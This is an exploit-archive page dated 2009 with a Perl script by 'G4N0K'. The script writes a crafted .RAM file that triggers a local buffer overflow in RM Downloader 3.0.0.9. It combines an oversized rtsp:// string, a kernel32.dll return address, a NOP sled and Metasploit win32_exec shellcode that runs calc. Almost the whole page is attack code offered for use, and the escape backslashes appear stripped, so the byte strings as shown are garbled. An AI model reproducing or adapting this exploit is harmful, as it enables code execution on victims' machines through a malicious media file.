RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
# Published : 2009-05-07
# Author : G4N0K
# Previous Title : Soritong MP3 Player 1.0 Local Buffer Overflow Exploit (SEH)
# Next Title : Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...From Iran

==============================================================================
	RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
==============================================================================
	[??] Script:.............[ RM Downloader 3.0.0.9 ].......................
	[??] Website:............[ http://mini-stream.net/ ].....................
	[??] Today:..............[ 07052009 ]....................................
	[??] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================

	[x] tested on "Windows XP SP2"... [:-)
	
=cut

my $MSD = "rtsp://"."G" x 26117;
my $SMN = "x90" x 16;
my $RA = "x5Dx38x82x7C"; # Kernel32.dll

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

  open(RAM,'>>gnk.ram');
  print RAM $MSD.$RA.$SMN.$Shcode;
  close(RAM);

# www.Syue.com [2009-05-07]